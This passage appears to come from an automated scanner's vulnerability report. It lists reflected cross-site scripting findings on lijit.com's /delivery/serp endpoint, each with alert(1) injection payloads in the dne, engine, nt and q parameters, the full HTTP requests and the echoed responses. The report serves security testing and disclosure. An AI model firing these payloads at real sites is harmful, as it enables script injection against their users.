Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:41 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:41 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15360

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
ethod = "regex";

var processedWideCnt = 0;

if (1 == 1){
var twoLinePref = true;
} else {
var twoLinePref = false;
}

//var twoLinePref = false;

function getQuery() {
var ad_hint = "8cd63";alert(1)//f6687a8b1ac";
if (ad_hint.length != 0 && ad_hint.indexOf("ad_hint") == -1) {
var hints = ad_hint.split(/\,/);
var date = new Date();
var hint = hints[date.getSeconds() % hints.length];

...[SNIP]...

1.12. http://www.lijit.com/delivery/serp [dne parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the dne request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17543"%3balert(1)//5467fe5844c was submitted in the dne parameter. This input was echoed as 17543";alert(1)//5467fe5844c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit17543"%3balert(1)//5467fe5844c&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:53 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n7 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:53 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15761

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
ideEleBottom.innerHTML = sl_html[1];
sl_html[1] = '';
setTimeout("fixPagWrap()", 0);
}

}

function renderSkyAds() {
var narrowEleName = "blog_lijit_narrow_ad_unit17543";alert(1)//5467fe5844c";
if (narrowEleName.length >
...[SNIP]...

1.13. http://www.lijit.com/delivery/serp [engine parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the engine request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21855'><script>alert(1)</script>c51676f35cc was submitted in the engine parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other21855'><script>alert(1)</script>c51676f35cc&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:33 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:33 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15982

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv&numAds=2 &serp=1&premium=1&engine=other21855'><script>alert(1)</script>c51676f35cc&lijit_kw=xss xss cd fgytr ghjk&cb=1354382281&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520%26ns%3D8%26engine%3Dother21855%27%
...[SNIP]...

1.14. http://www.lijit.com/delivery/serp [engine parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the engine request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c12'%3balert(1)//305f5b6dffc was submitted in the engine parameter. This input was echoed as f9c12';alert(1)//305f5b6dffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=otherf9c12'%3balert(1)//305f5b6dffc&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:34 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:35 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15846

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<scr' + 'ipt src="' + 'http://ap.lijit.com///www/delivery/ajs.php?zoneid=28664&username=buddytv&numAds=2 &serp=1&premium=1&engine=otherf9c12';alert(1)//305f5b6dffc&lijit_kw=&cb=767660939&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520%26ns%3D8%26engine%3Dotherf9c12%27%253balert%281%29%2F%2F
...[SNIP]...

1.15. http://www.lijit.com/delivery/serp [nt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the nt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 40532%3balert(1)//c8b04fdbddd was submitted in the nt parameter. This input was echoed as 40532;alert(1)//c8b04fdbddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%2040532%3balert(1)//c8b04fdbddd&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:12 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n4), ms sea-ag1-n4 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:12 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15829

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
pt = true;
var textAdNoAdsZoneId = 28664;
var skyscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 51423;
var textAdBottomZoneId = 51735;
var skyCnt=0;

var textAdCnt=2 40532;alert(1)//c8b04fdbddd;

var zone51423Delivered = false;

var zone51735Delivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoogleAds = 0;
var numSkyGoogleAds = 0;

//deprecated for new z
...[SNIP]...

1.16. http://www.lijit.com/delivery/serp [nt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the nt request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9bdd'><script>alert(1)</script>ee611d7da11 was submitted in the nt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20d9bdd'><script>alert(1)</script>ee611d7da11&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:09 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:10 GMT
Age: 0
Content-Length: 15981
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv&numAds=2 d9bdd'><script>alert(1)</script>ee611d7da11&serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1513582916&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520d9bdd
...[SNIP]...

1.17. http://www.lijit.com/delivery/serp [nt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the nt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 798f9'-alert(1)-'735a329a831 was submitted in the nt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20798f9'-alert(1)-'735a329a831&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:11 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n9), ms sea-ag1-n9 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:12 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15822

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<scr' + 'ipt src="' + 'http://ap.lijit.com///www/delivery/ajs.php?zoneid=28664&username=buddytv&numAds=2 798f9'-alert(1)-'735a329a831&serp=1&premium=1&engine=other&lijit_kw=&cb=183282488&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520798f9%27-alert%281%29-%2773
...[SNIP]...

1.18. http://www.lijit.com/delivery/serp [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9aac6'><script>alert(1)</script>a426f58dd95 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk9aac6'><script>alert(1)</script>a426f58dd95&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:43:10 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n7 ( sea-ag1-n4), ms sea-ag1-n4 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:43:10 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15937

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
